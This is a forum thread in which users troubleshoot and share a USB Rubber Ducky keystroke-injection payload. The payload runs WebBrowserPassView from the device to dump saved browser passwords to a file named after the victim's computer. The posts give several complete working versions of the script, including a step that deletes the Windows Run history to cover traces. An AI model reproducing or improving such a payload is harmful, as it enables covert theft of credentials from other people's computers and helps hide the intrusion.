macroliux Posted November 25, 2019 Share Posted November 25, 2019 Hi, new to the ducky world and have been researching and reading as much as I can fine. The issue I need help with is that the ducky launches powershell and then the program I tell it to, but the keyboard commands to highlight the text and save file doesn't work. Here's the commands I'm running: REM opens powershell DELAY 1000 GUI r DELAY 100 STRING powershell ENTER DELAY 500 REM removes run history STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER DELAY 200 REM navigates to USB drive called _ for me STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name ENTER DELAY 500 STRING cd $usbPath.name ENTER DELAY 500 REM runs WebrowserPassView from ducky drive STRING start-process -nonewwindow -filepath ./WebBrowserPassView.exe ENTER DELAY 5000 CTRL A DELAY 500 CTRL S DELAY 500 STRING PASSWORD DELAY 50 ENTER Has anyone else had this issue and found any solutions? Link to comment Share on other sites More sharing options...
SM0K3_l Posted November 30, 2019 Share Posted November 30, 2019 Im doing the same payload, but mine looks very different are you getting stuck on the select all and save portion? Link to comment Share on other sites More sharing options...
macroliux Posted November 30, 2019 Author Share Posted November 30, 2019 1 hour ago, SM0K3_l said: Im doing the same payload, but mine looks very different are you getting stuck on the select all and save portion? This is the final code I've ended up with that works for me on every PC I've tested it on (about 6). REM opens powershell DELAY 5000 GUI r DELAY 2000 STRING powershell ENTER DELAY 100 REM navigates to USB drive called _ for me STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq '_' } | select name ENTER DELAY 500 STRING cd $usbPath.name ENTER DELAY 200 REM runs WebrowserPassView from ducky drive STRING CMD ENTER DELAY 200 STRING WebBrowserPassView.exe /stext pass_%computername%.txt ENTER DELAY 1000 STRING exit ENTER DELAY 500 REM removes run history STRING Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue ENTER DELAY 100 STRING exit ENTER Link to comment Share on other sites More sharing options...
macroliux Posted November 30, 2019 Author Share Posted November 30, 2019 Oh, I also forgot to mention that you have to download the WebBrowserPassView.exe from the nirsoft site that supports command line options as the regular version you download does not. Instructions on how to download that are on this site: https://www.nirsoft.net/password_recovery_tools.html Link to comment Share on other sites More sharing options...
SM0K3_l Posted November 30, 2019 Share Posted November 30, 2019 Thank you it finally worked the other version of the application was the problem what I ended up with DELAY 750 ALT SPACE STRING N DELAY 500 REM opens powershell GUI r DELAY 750 STRING powershell ENTER DELAY 250 REM navigates to USB drive called _ for me STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'DUCKY' } | select name ENTER DELAY 500 STRING cd $usbPath.name ENTER DELAY 200 REM runs WebrowserPassView from ducky drive STRING CMD ENTER DELAY 200 STRING WebBrowserPassView.exe /stext pass_%computername%.txt ENTER DELAY 1000 STRING exit ENTER DELAY 500 STRING exit ENTER Link to comment Share on other sites More sharing options...
macroliux Posted November 30, 2019 Author Share Posted November 30, 2019 Nice, glad you got it working. I know it gets frustrating at times. lol Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.